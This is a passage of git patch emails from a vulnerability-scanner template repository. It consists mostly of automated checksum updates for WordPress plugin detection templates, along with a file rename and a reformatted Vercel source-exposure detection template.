+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:4d89cb9dd12f445a688ff9dd66345e217d3db787
+templates-checksum.txt:327b0ff650c1c21ceda827a78006fca7882facc1
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 4d8b053fb9d6c993d38b128dc8b7a7d1c55dffb0 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 09:19:54 +0000
Subject: [PATCH 0496/1090] Auto Generated Templates Checksum [Sat Sep 23
 09:19:53 UTC 2023] :robot:

---
 templates-checksum.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 2192d6df30..e9e89084fb 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4271,7 +4271,7 @@ http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df1
 http/miscellaneous/apple-app-site-association.yaml:541c9e23a52f733b557f3e0a7edee2d9d66069b8
 http/miscellaneous/aws-ecs-container-agent-tasks.yaml:e19643775ad6c43b074bc8773f31dce3dba3fd05
 http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6
-http/miscellaneous/crypto-mining-malware.yaml:253d42ee74ffdb0947f1ec2df0ae4f2a5645bedb
+http/miscellaneous/crypto-mining-malware.yaml:21ece0c0bb1d84a3033b5a92cbc65a072ff4ab43
 http/miscellaneous/defaced-website-detect.yaml:4e5e678e0a1d90d2162ac2fdc5930fecb20d6b81
 http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177772f8b
 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:327b0ff650c1c21ceda827a78006fca7882facc1
+templates-checksum.txt:70b84b26bc7cdc9c616ddf267c2de9d1b4e595ab
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 3e249449a7f05da3b4b61763fcd540c3ca5aea82 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 23 Sep 2023 15:11:29 +0530
Subject: [PATCH 0497/1090] misc update

---
 .../vercel-source-exposure.yaml               | 35 ++++++++++++-------
 1 file changed, 22 insertions(+), 13 deletions(-)

diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml
index 6256ba19fd..5fca611120 100644
--- a/http/misconfiguration/vercel-source-exposure.yaml
+++ b/http/misconfiguration/vercel-source-exposure.yaml
@@ -1,28 +1,37 @@
 id: vercel-source-exposure
+
 info:
   name: Vercel Source Code Exposure
   author: hlop
   severity: medium
+  reference:
+    - https://vercel.com/docs/projects/overview#logs-and-source-protection
+  description: |
+    The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform.
+  impact: |
+    This misconfiguration can lead to the exposure of sensitive information, such as API keys, credentials, and proprietary code, which can be used for further attacks or unauthorized access.
+  metadata:
+    fofa-query: cname_domain="vercel.app" || icon_hash="-2070047203"
   tags: vercel,exposure,misconfig
-  description: Vercel /_src endpoint publicly accessible which discloses source code.
-  reference: "https://vercel.com/docs/projects/overview#logs-and-source-protection" 
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/_src"
+
     redirects: true
     max-redirects: 3
     matchers-condition: and
     matchers:
-     - type: word
-       words:
-         - "Deployment Source"
-         - "Deployment Source – Dashboard – Vercel"
-       condition: and
-       part: body
-     - type: word
-       words:
-         - "Login – Vercel"
-       part: body
-       negative: true
+      - type: word
+        part: body
+        words:
+          - "Deployment Source"
+          - "Deployment Source – Dashboard – Vercel"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "Login – Vercel"
+        negative: true

From d549599606468d66848f6ac03f8cc4fd62d5b40e Mon Sep 17 00:00:00 2001
From: pentesttools-com <139468926+pentesttools-com@users.noreply.github.com>
Date: Sat, 23 Sep 2023 12:42:58 +0300
Subject: [PATCH 0498/1090] fix: typo in cve-2023-23492 template name (#8250)

---
 http/cves/2023/{CVE-2023-23492 2.yaml => CVE-2023-23492.yaml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename http/cves/2023/{CVE-2023-23492 2.yaml => CVE-2023-23492.yaml} (100%)

diff --git a/http/cves/2023/CVE-2023-23492 2.yaml b/http/cves/2023/CVE-2023-23492.yaml
similarity index 100%
rename from http/cves/2023/CVE-2023-23492 2.yaml
rename to http/cves/2023/CVE-2023-23492.yaml

From 5aba529d3e0e116cc68d2bd1fbd0b4ad4c9a075e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 09:43:29 +0000
Subject: [PATCH 0500/1090] Auto Generated Templates Checksum [Sat Sep 23
 09:43:29 UTC 2023] :robot:

---
 templates-checksum.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index e9e89084fb..441ca3736b 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2526,7 +2526,7 @@ http/cves/2023/CVE-2023-23333.yaml:224f99e20d9e35a6128133ed7b934432aa21e3ff
 http/cves/2023/CVE-2023-23488.yaml:28d585d35cbfe13e6400c987fe614fa22b6a9678
 http/cves/2023/CVE-2023-23489.yaml:9dd085b7e48ee2f828d2de79907475b780fe4641
 http/cves/2023/CVE-2023-23491.yaml:1a5b98ddd08f5082d2076d510aaf5023e446af99
-http/cves/2023/CVE-2023-23492 2.yaml:503ad1127d9bfa3ffdaa148703be06c91312c31b
+http/cves/2023/CVE-2023-23492.yaml:503ad1127d9bfa3ffdaa148703be06c91312c31b
 http/cves/2023/CVE-2023-2356.yaml:f2fd07fe4c64762d2e2a3ad3e4326bd576a11fce
 http/cves/2023/CVE-2023-23752.yaml:95b530417566e21790a45add7914385db04375db
 http/cves/2023/CVE-2023-24044.yaml:1e372b73e3d2f7651b8658cd72eedec921fb5e46
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:70b84b26bc7cdc9c616ddf267c2de9d1b4e595ab
+templates-checksum.txt:b320086b35804ef58829bec8315032deb6a38d86
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From cd4a4e1c995b2fa795fbdbed6fbf708e288e7a0f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 24 Sep 2023 02:52:34 +0000
Subject: [PATCH 0501/1090] Auto Generated New Template Addition List [Sun Sep
 24 02:52:34 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 37f8c823a8..0eae83ea3d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,3 +5,4 @@ http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
+http/misconfiguration/installer/zabbix-installer.yaml

From 71225a8ea1690719f49d5b934aac337b4ea90f31 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 24 Sep 2023 02:52:54 +0000
Subject: [PATCH 0502/1090] Auto Generated Templates Checksum [Sun Sep 24
 02:52:54 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 441ca3736b..c7ca22717e 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4554,6 +4554,7 @@ http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee
 http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927
 http/misconfiguration/installer/wp-install.yaml:7263f4ac7377b12614b0480f0da9c47264a8854e
 http/misconfiguration/installer/yzmcms-installer.yaml:444353079eddec6a26731f0f1834af2c6be6cf48
+http/misconfiguration/installer/zabbix-installer.yaml:171ff0d961a9bb903432c1ccab809f3d75174a4c
 http/misconfiguration/installer/zenphoto-setup.yaml:9730edcaf481dd4e868f956e698001f4bdf268ed
 http/misconfiguration/internal-ip-disclosure.yaml:5b172cc1e7c7baa6ab5dfd5ac833c27175ebf020
 http/misconfiguration/iot-vdme-simulator.yaml:20c893d91d0de38290ec70c12bb5003944c68f84
@@ -7186,7 +7187,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:b320086b35804ef58829bec8315032deb6a38d86
+templates-checksum.txt:15420790694f75cf46e0fdf34d0c1601bb8517c9
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From d8cc4d809e8fe0abbbc899ba6d012c43da464100 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 24 Sep 2023 04:02:04 +0000
Subject: [PATCH 0503/1090] Auto WordPress Plugins Update [Sun Sep 24 04:02:04
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/so-widgets-bundle.txt                 | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
